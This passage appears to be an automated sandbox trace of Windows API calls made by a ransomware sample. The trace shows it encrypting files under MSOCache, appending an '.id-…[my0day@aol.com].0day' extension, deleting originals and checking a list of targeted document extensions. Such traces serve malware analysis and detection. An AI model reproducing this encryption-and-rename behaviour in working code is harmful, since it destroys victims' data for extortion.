| out: lpNewFilePointer=0x0) returned 1 [0037.983] WriteFile (in: hFile=0x174, lpBuffer=0x3c80020*, nNumberOfBytesToWrite=0xc00fe, lpNumberOfBytesWritten=0x34bfcb0, lpOverlapped=0x0 | out: lpBuffer=0x3c80020*, lpNumberOfBytesWritten=0x34bfcb0*=0xc00fe, lpOverlapped=0x0) returned 1 [0038.335] SetEndOfFile (hFile=0x174) returned 1 [0038.335] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x40000) returned 0x3f8a0a8 [0038.339] SetFilePointerEx (in: hFile=0x174, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x34bfc7c | out: lpNewFilePointer=0x0) returned 1 [0038.339] WriteFile (in: hFile=0x174, lpBuffer=0x3f8a0a8*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x34bfc88, lpOverlapped=0x0 | out: lpBuffer=0x3f8a0a8*, lpNumberOfBytesWritten=0x34bfc88*=0x40000, lpOverlapped=0x0) returned 1 [0038.341] SetFilePointerEx (in: hFile=0x174, liDistanceToMove=0x3a674f, lpNewFilePointer=0x0, dwMoveMethod=0x34bfc7c | out: lpNewFilePointer=0x0) returned 1 [0038.341] WriteFile (in: hFile=0x174, lpBuffer=0x3f8a0a8*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x34bfc88, lpOverlapped=0x0 | out: lpBuffer=0x3f8a0a8*, lpNumberOfBytesWritten=0x34bfc88*=0x40000, lpOverlapped=0x0) returned 1 [0038.343] SetFilePointerEx (in: hFile=0x174, liDistanceToMove=0xab35ed, lpNewFilePointer=0x0, dwMoveMethod=0x34bfc7c | out: lpNewFilePointer=0x0) returned 1 [0038.343] WriteFile (in: hFile=0x174, lpBuffer=0x3f8a0a8*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x34bfc88, lpOverlapped=0x0 | out: lpBuffer=0x3f8a0a8*, lpNumberOfBytesWritten=0x34bfc88*=0x40000, lpOverlapped=0x0) returned 1 [0038.346] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x3f8a0a8 | out: hHeap=0x5f0000) returned 1 [0038.346] CloseHandle (hObject=0x174) returned 1 [0040.823] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.cab.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x2020) returned 1 [0040.824] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.cab") returned 81 [0040.824] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.cab") returned 81 [0040.824] lstrlenW (lpString=".doc") returned 4 [0040.824] lstrcmpiW (lpString1=".doc", lpString2=".cab") returned 1 [0040.824] lstrlenW (lpString=".docx") returned 5 [0040.824] lstrcmpiW (lpString1=".docx", lpString2="f.cab") returned -1 [0040.824] lstrlenW (lpString=".pdf") returned 4 [0040.824] lstrcmpiW (lpString1=".pdf", lpString2=".cab") returned 1 [0040.824] lstrlenW (lpString=".xls") returned 4 [0040.824] lstrcmpiW (lpString1=".xls", lpString2=".cab") returned 1 [0040.824] lstrlenW (lpString=".xlsx") returned 5 [0040.824] lstrcmpiW (lpString1=".xlsx", lpString2="f.cab") returned -1 [0040.824] lstrlenW (lpString=".ppt") returned 4 [0040.824] lstrcmpiW (lpString1=".ppt", lpString2=".cab") returned 1 [0040.824] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.cab") returned 81 [0040.824] lstrlenW (lpString=".zip") returned 4 [0040.824] lstrcmpiW (lpString1=".zip", lpString2=".cab") returned 1 [0040.824] lstrlenW (lpString=".rar") returned 4 [0040.824] lstrcmpiW (lpString1=".rar", lpString2=".cab") returned 1 [0040.824] lstrlenW (lpString=".bz2") returned 4 [0040.824] lstrcmpiW (lpString1=".bz2", lpString2=".cab") returned -1 [0040.824] lstrlenW (lpString=".7z") returned 3 [0040.824] lstrcmpiW (lpString1=".7z", lpString2="cab") returned -1 [0040.824] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.cab") returned 81 [0040.824] lstrlenW (lpString=".dbf") returned 4 [0040.824] lstrcmpiW (lpString1=".dbf", lpString2=".cab") returned 1 [0040.824] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.cab") returned 81 [0040.824] lstrlenW (lpString=".1cd") returned 4 [0040.824] lstrcmpiW (lpString1=".1cd", lpString2=".cab") returned -1 [0040.824] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.cab") returned 81 [0040.824] lstrlenW (lpString=".jpg") returned 4 [0040.824] lstrcmpiW (lpString1=".jpg", lpString2=".cab") returned 1 [0040.825] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.cab") returned 81 [0040.825] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.cab") returned 81 [0040.825] lstrlenW (lpString=".doc") returned 4 [0040.825] lstrcmpiW (lpString1=".doc", lpString2=".cab") returned 1 [0040.825] lstrlenW (lpString=".docx") returned 5 [0040.825] lstrcmpiW (lpString1=".docx", lpString2="f.cab") returned -1 [0040.825] lstrlenW (lpString=".pdf") returned 4 [0040.825] lstrcmpiW (lpString1=".pdf", lpString2=".cab") returned 1 [0040.825] lstrlenW (lpString=".xls") returned 4 [0040.825] lstrcmpiW (lpString1=".xls", lpString2=".cab") returned 1 [0040.825] lstrlenW (lpString=".xlsx") returned 5 [0040.825] lstrcmpiW (lpString1=".xlsx", lpString2="f.cab") returned -1 [0040.825] lstrlenW (lpString=".ppt") returned 4 [0040.825] lstrcmpiW (lpString1=".ppt", lpString2=".cab") returned 1 [0040.825] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.cab") returned 81 [0040.825] lstrlenW (lpString=".zip") returned 4 [0040.825] lstrcmpiW (lpString1=".zip", lpString2=".cab") returned 1 [0040.825] lstrlenW (lpString=".rar") returned 4 [0040.825] lstrcmpiW (lpString1=".rar", lpString2=".cab") returned 1 [0040.825] lstrlenW (lpString=".bz2") returned 4 [0040.825] lstrcmpiW (lpString1=".bz2", lpString2=".cab") returned -1 [0040.825] lstrlenW (lpString=".7z") returned 3 [0040.825] lstrcmpiW (lpString1=".7z", lpString2="cab") returned -1 [0040.825] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.cab") returned 81 [0040.825] lstrlenW (lpString=".dbf") returned 4 [0040.825] lstrcmpiW (lpString1=".dbf", lpString2=".cab") returned 1 [0040.825] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.cab") returned 81 [0040.825] lstrlenW (lpString=".1cd") returned 4 [0040.825] lstrcmpiW (lpString1=".1cd", lpString2=".cab") returned -1 [0040.825] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.cab") returned 81 [0040.825] lstrlenW (lpString=".jpg") returned 4 [0040.825] lstrcmpiW (lpString1=".jpg", lpString2=".cab") returned 1 [0040.826] lstrcmpiW (lpString1=".msi", lpString2=".0day") returned 1 [0040.826] lstrlenW (lpString="Office32MUI.msi") returned 15 [0040.826] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-0043-0409-1000-0000000ff1ce}-c\\office32mui.msi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x174 [0040.826] GetFileSizeEx (in: hFile=0x174, lpFileSize=0x34bff1c | out: lpFileSize=0x34bff1c*=873984) returned 1 [0040.826] CloseHandle (hObject=0x174) returned 1 [0040.826] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-0043-0409-1000-0000000ff1ce}-c\\office32mui.msi")) returned 0x2020 [0040.826] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.msi.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\msocache\\all users\\{90140000-0043-0409-1000-0000000ff1ce}-c\\office32mui.msi.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0040.826] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-0043-0409-1000-0000000ff1ce}-c\\office32mui.msi"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x174 [0040.826] SetFilePointerEx (in: hFile=0x174, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x34bfec8 | out: lpNewFilePointer=0x0) returned 1 [0040.826] SetFilePointerEx (in: hFile=0x174, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x34bfec8 | out: lpNewFilePointer=0x0) returned 1 [0040.826] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.msi.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\msocache\\all users\\{90140000-0043-0409-1000-0000000ff1ce}-c\\office32mui.msi.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f4 [0040.827] GetLastError () returned 0x0 [0040.827] ReadFile (in: hFile=0x174, lpBuffer=0x3c80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x34bfed4, lpOverlapped=0x0 | out: lpBuffer=0x3c80020*, lpNumberOfBytesRead=0x34bfed4*=0xd5600, lpOverlapped=0x0) returned 1 [0040.849] WriteFile (in: hFile=0x1f4, lpBuffer=0x3c80020*, nNumberOfBytesToWrite=0xd5610, lpNumberOfBytesWritten=0x34bfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3c80020*, lpNumberOfBytesWritten=0x34bfc9c*=0xd5610, lpOverlapped=0x0) returned 1 [0041.084] ReadFile (in: hFile=0x174, lpBuffer=0x3c80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x34bfed4, lpOverlapped=0x0 | out: lpBuffer=0x3c80020*, lpNumberOfBytesRead=0x34bfed4*=0x0, lpOverlapped=0x0) returned 1 [0041.084] WriteFile (in: hFile=0x1f4, lpBuffer=0x3c80020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x34bfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3c80020*, lpNumberOfBytesWritten=0x34bfc9c*=0xf2, lpOverlapped=0x0) returned 1 [0041.084] SetEndOfFile (hFile=0x1f4) returned 1 [0041.084] CloseHandle (hObject=0x1f4) returned 1 [0041.091] SetFilePointerEx (in: hFile=0x174, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x34bfec8 | out: lpNewFilePointer=0x0) returned 1 [0041.091] SetEndOfFile (hFile=0x174) returned 1 [0041.099] CloseHandle (hObject=0x174) returned 1 [0041.099] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.msi.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x2020) returned 1 [0041.099] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-0043-0409-1000-0000000ff1ce}-c\\office32mui.msi")) returned 1 [0041.099] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.msi") returned 78 [0041.099] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.msi") returned 78 [0041.099] lstrlenW (lpString=".doc") returned 4 [0041.099] lstrcmpiW (lpString1=".doc", lpString2=".msi") returned -1 [0041.099] lstrlenW (lpString=".docx") returned 5 [0041.099] lstrcmpiW (lpString1=".docx", lpString2="I.msi") returned -1 [0041.099] lstrlenW (lpString=".pdf") returned 4 [0041.099] lstrcmpiW (lpString1=".pdf", lpString2=".msi") returned 1 [0041.099] lstrlenW (lpString=".xls") returned 4 [0041.099] lstrcmpiW (lpString1=".xls", lpString2=".msi") returned 1 [0041.099] lstrlenW (lpString=".xlsx") returned 5 [0041.099] lstrcmpiW (lpString1=".xlsx", lpString2="I.msi") returned -1 [0041.100] lstrlenW (lpString=".ppt") returned 4 [0041.100] lstrcmpiW (lpString1=".ppt", lpString2=".msi") returned 1 [0041.100] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.msi") returned 78 [0041.100] lstrlenW (lpString=".zip") returned 4 [0041.100] lstrcmpiW (lpString1=".zip", lpString2=".msi") returned 1 [0041.100] lstrlenW (lpString=".rar") returned 4 [0041.100] lstrcmpiW (lpString1=".rar", lpString2=".msi") returned 1 [0041.100] lstrlenW (lpString=".bz2") returned 4 [0041.100] lstrcmpiW (lpString1=".bz2", lpString2=".msi") returned -1 [0041.100] lstrlenW (lpString=".7z") returned 3 [0041.100] lstrcmpiW (lpString1=".7z", lpString2="msi") returned -1 [0041.100] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.msi") returned 78 [0041.100] lstrlenW (lpString=".dbf") returned 4 [0041.100] lstrcmpiW (lpString1=".dbf", lpString2=".msi") returned -1 [0041.100] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.msi") returned 78 [0041.100] lstrlenW (lpString=".1cd") returned 4 [0041.100] lstrcmpiW (lpString1=".1cd", lpString2=".msi") returned -1 [0041.100] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.msi") returned 78 [0041.100] lstrlenW (lpString=".jpg") returned 4 [0041.100] lstrcmpiW (lpString1=".jpg", lpString2=".msi") returned -1 [0041.100] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.msi") returned 78 [0041.100] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.msi") returned 78 [0041.100] lstrlenW (lpString=".doc") returned 4 [0041.100] lstrcmpiW (lpString1=".doc", lpString2=".msi") returned -1 [0041.100] lstrlenW (lpString=".docx") returned 5 [0041.100] lstrcmpiW (lpString1=".docx", lpString2="I.msi") returned -1 [0041.100] lstrlenW (lpString=".pdf") returned 4 [0041.100] lstrcmpiW (lpString1=".pdf", lpString2=".msi") returned 1 [0041.100] lstrlenW (lpString=".xls") returned 4 [0041.100] lstrcmpiW (lpString1=".xls", lpString2=".msi") returned 1 [0041.100] lstrlenW (lpString=".xlsx") returned 5 [0041.100] lstrcmpiW (lpString1=".xlsx", lpString2="I.msi") returned -1 [0041.100] lstrlenW (lpString=".ppt") returned 4 [0041.101] lstrcmpiW (lpString1=".ppt", lpString2=".msi") returned 1 [0041.101] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.msi") returned 78 [0041.101] lstrlenW (lpString=".zip") returned 4 [0041.101] lstrcmpiW (lpString1=".zip", lpString2=".msi") returned 1 [0041.101] lstrlenW (lpString=".rar") returned 4 [0041.101] lstrcmpiW (lpString1=".rar", lpString2=".msi") returned 1 [0041.101] lstrlenW (lpString=".bz2") returned 4 [0041.101] lstrcmpiW (lpString1=".bz2", lpString2=".msi") returned -1 [0041.101] lstrlenW (lpString=".7z") returned 3 [0041.101] lstrcmpiW (lpString1=".7z", lpString2="msi") returned -1 [0041.101] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.msi") returned 78 [0041.101] lstrlenW (lpString=".dbf") returned 4 [0041.101] lstrcmpiW (lpString1=".dbf", lpString2=".msi") returned -1 [0041.101] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.msi") returned 78 [0041.101] lstrlenW (lpString=".1cd") returned 4 [0041.101] lstrcmpiW (lpString1=".1cd", lpString2=".msi") returned -1 [0041.101] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.msi") returned 78 [0041.101] lstrlenW (lpString=".jpg") returned 4 [0041.101] lstrcmpiW (lpString1=".jpg", lpString2=".msi") returned -1 [0041.101] lstrcmpiW (lpString1=".cab", lpString2=".0day") returned 1 [0041.101] lstrlenW (lpString="InfLR.cab") returned 9 [0041.101] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-0044-0409-1000-0000000ff1ce}-c\\inflr.cab"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x174 [0041.102] GetFileSizeEx (in: hFile=0x174, lpFileSize=0x34bff1c | out: lpFileSize=0x34bff1c*=18874884) returned 1 [0041.102] CloseHandle (hObject=0x174) returned 1 [0041.102] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-0044-0409-1000-0000000ff1ce}-c\\inflr.cab")) returned 0x2020 [0041.102] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfLR.cab.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\msocache\\all users\\{90140000-0044-0409-1000-0000000ff1ce}-c\\inflr.cab.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0041.102] MoveFileW (lpExistingFileName="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-0044-0409-1000-0000000ff1ce}-c\\inflr.cab"), lpNewFileName="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfLR.cab.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\msocache\\all users\\{90140000-0044-0409-1000-0000000ff1ce}-c\\inflr.cab.id-9c354b42.[my0day@aol.com].0day")) returned 1 [0041.102] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfLR.cab.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\msocache\\all users\\{90140000-0044-0409-1000-0000000ff1ce}-c\\inflr.cab.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x174 [0041.102] SetFilePointerEx (in: hFile=0x174, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x34bfc6c | out: lpNewFilePointer=0x0) returned 1 [0041.103] SetFilePointerEx (in: hFile=0x174, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x34bfc2c | out: lpNewFilePointer=0x0) returned 1 [0041.103] ReadFile (in: hFile=0x174, lpBuffer=0x3c80058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x34bfc38, lpOverlapped=0x0 | out: lpBuffer=0x3c80058*, lpNumberOfBytesRead=0x34bfc38*=0x40000, lpOverlapped=0x0) returned 1 [0041.120] SetFilePointerEx (in: hFile=0x174, liDistanceToMove=0x6000ac, lpNewFilePointer=0x0, dwMoveMethod=0x34bfc2c | out: lpNewFilePointer=0x0) returned 1 [0041.121] ReadFile (in: hFile=0x174, lpBuffer=0x3cc0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x34bfc38, lpOverlapped=0x0 | out: lpBuffer=0x3cc0058*, lpNumberOfBytesRead=0x34bfc38*=0x40000, lpOverlapped=0x0) returned 1 [0041.127] SetFilePointerEx (in: hFile=0x174, liDistanceToMove=0xfffc0000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x34bfc6c | out: lpNewFilePointer=0xffffffff) returned 1 [0041.128] SetFilePointerEx (in: hFile=0x174, liDistanceToMove=0x11c0204, lpNewFilePointer=0x0, dwMoveMethod=0x34bfc2c | out: lpNewFilePointer=0x0) returned 1 [0041.128] ReadFile (in: hFile=0x174, lpBuffer=0x3d00058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x34bfc38, lpOverlapped=0x0 | out: lpBuffer=0x3d00058*, lpNumberOfBytesRead=0x34bfc38*=0x40000, lpOverlapped=0x0) returned 1 [0041.432] SetFilePointerEx (in: hFile=0x174, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x34bfec8 | out: lpNewFilePointer=0x0) returned 1 [0041.432] WriteFile (in: hFile=0x174, lpBuffer=0x3c80020*, nNumberOfBytesToWrite=0xc00fe, lpNumberOfBytesWritten=0x34bfcb0, lpOverlapped=0x0 | out: lpBuffer=0x3c80020*, lpNumberOfBytesWritten=0x34bfcb0*=0xc00fe, lpOverlapped=0x0) returned 1 [0041.444] SetEndOfFile (hFile=0x174) returned 1 [0041.445] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x40000) returned 0x3f8a0a8 [0041.449] SetFilePointerEx (in: hFile=0x174, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x34bfc7c | out: lpNewFilePointer=0x0) returned 1 [0041.449] WriteFile (in: hFile=0x174, lpBuffer=0x3f8a0a8*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x34bfc88, lpOverlapped=0x0 | out: lpBuffer=0x3f8a0a8*, lpNumberOfBytesWritten=0x34bfc88*=0x40000, lpOverlapped=0x0) returned 1 [0041.450] SetFilePointerEx (in: hFile=0x174, liDistanceToMove=0x6000ac, lpNewFilePointer=0x0, dwMoveMethod=0x34bfc7c | out: lpNewFilePointer=0x0) returned 1 [0041.450] WriteFile (in: hFile=0x174, lpBuffer=0x3f8a0a8*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x34bfc88, lpOverlapped=0x0 | out: lpBuffer=0x3f8a0a8*, lpNumberOfBytesWritten=0x34bfc88*=0x40000, lpOverlapped=0x0) returned 1 [0041.453] SetFilePointerEx (in: hFile=0x174, liDistanceToMove=0x11c0204, lpNewFilePointer=0x0, dwMoveMethod=0x34bfc7c | out: lpNewFilePointer=0x0) returned 1 [0041.453] WriteFile (in: hFile=0x174, lpBuffer=0x3f8a0a8*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x34bfc88, lpOverlapped=0x0 | out: lpBuffer=0x3f8a0a8*, lpNumberOfBytesWritten=0x34bfc88*=0x40000, lpOverlapped=0x0) returned 1 [0041.456] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x3f8a0a8 | out: hHeap=0x5f0000) returned 1 [0041.456] CloseHandle (hObject=0x174) returned 1 [0042.548] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfLR.cab.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x2020) returned 1 [0042.548] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfLR.cab") returned 72 [0042.548] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfLR.cab") returned 72 [0042.548] lstrlenW (lpString=".doc") returned 4 [0042.549] lstrcmpiW (lpString1=".doc", lpString2=".cab") returned 1 [0042.549] lstrlenW (lpString=".docx") returned 5 [0042.549] lstrcmpiW (lpString1=".docx", lpString2="R.cab") returned -1 [0042.549] lstrlenW (lpString=".pdf") returned 4 [0042.549] lstrcmpiW (lpString1=".pdf", lpString2=".cab") returned 1 [0042.549] lstrlenW (lpString=".xls") returned 4 [0042.549] lstrcmpiW (lpString1=".xls", lpString2=".cab") returned 1 [0042.549] lstrlenW (lpString=".xlsx") returned 5 [0042.549] lstrcmpiW (lpString1=".xlsx", lpString2="R.cab") returned -1 [0042.549] lstrlenW (lpString=".ppt") returned 4 [0042.549] lstrcmpiW (lpString1=".ppt", lpString2=".cab") returned 1 [0042.549] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfLR.cab") returned 72 [0042.549] lstrlenW (lpString=".zip") returned 4 [0042.549] lstrcmpiW (lpString1=".zip", lpString2=".cab") returned 1 [0042.549] lstrlenW (lpString=".rar") returned 4 [0042.549] lstrcmpiW (lpString1=".rar", lpString2=".cab") returned 1 [0042.549] lstrlenW (lpString=".bz2") returned 4 [0042.549] lstrcmpiW (lpString1=".bz2", lpString2=".cab") returned -1 [0042.549] lstrlenW (lpString=".7z") returned 3 [0042.549] lstrcmpiW (lpString1=".7z", lpString2="cab") returned -1 [0042.549] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfLR.cab") returned 72 [0042.549] lstrlenW (lpString=".dbf") returned 4 [0042.549] lstrcmpiW (lpString1=".dbf", lpString2=".cab") returned 1 [0042.549] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfLR.cab") returned 72 [0042.549] lstrlenW (lpString=".1cd") returned 4 [0042.549] lstrcmpiW (lpString1=".1cd", lpString2=".cab") returned -1 [0042.549] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfLR.cab") returned 72 [0042.549] lstrlenW (lpString=".jpg") returned 4 [0042.549] lstrcmpiW (lpString1=".jpg", lpString2=".cab") returned 1 [0042.549] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfLR.cab") returned 72 [0042.549] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfLR.cab") returned 72 [0042.549] lstrlenW (lpString=".doc") returned 4 [0042.549] lstrcmpiW (lpString1=".doc", lpString2=".cab") returned 1 [0042.550] lstrlenW (lpString=".docx") returned 5 [0042.550] lstrcmpiW (lpString1=".docx", lpString2="R.cab") returned -1 [0042.550] lstrlenW (lpString=".pdf") returned 4 [0042.550] lstrcmpiW (lpString1=".pdf", lpString2=".cab") returned 1 [0042.550] lstrlenW (lpString=".xls") returned 4 [0042.550] lstrcmpiW (lpString1=".xls", lpString2=".cab") returned 1 [0042.550] lstrlenW (lpString=".xlsx") returned 5 [0042.550] lstrcmpiW (lpString1=".xlsx", lpString2="R.cab") returned -1 [0042.550] lstrlenW (lpString=".ppt") returned 4 [0042.550] lstrcmpiW (lpString1=".ppt", lpString2=".cab") returned 1 [0042.550] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfLR.cab") returned 72 [0042.550] lstrlenW (lpString=".zip") returned 4 [0042.550] lstrcmpiW (lpString1=".zip", lpString2=".cab") returned 1 [0042.550] lstrlenW (lpString=".rar") returned 4 [0042.550] lstrcmpiW (lpString1=".rar", lpString2=".cab") returned 1 [0042.550] lstrlenW (lpString=".bz2") returned 4 [0042.550] lstrcmpiW (lpString1=".bz2", lpString2=".cab") returned -1 [0042.550] lstrlenW (lpString=".7z") returned 3 [0042.550] lstrcmpiW (lpString1=".7z", lpString2="cab") returned -1 [0042.550] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfLR.cab") returned 72 [0042.550] lstrlenW (lpString=".dbf") returned 4 [0042.550] lstrcmpiW (lpString1=".dbf", lpString2=".cab") returned 1 [0042.550] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfLR.cab") returned 72 [0042.550] lstrlenW (lpString=".1cd") returned 4 [0042.550] lstrcmpiW (lpString1=".1cd", lpString2=".cab") returned -1 [0042.550] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfLR.cab") returned 72 [0042.550] lstrlenW (lpString=".jpg") returned 4 [0042.550] lstrcmpiW (lpString1=".jpg", lpString2=".cab") returned 1 [0042.550] 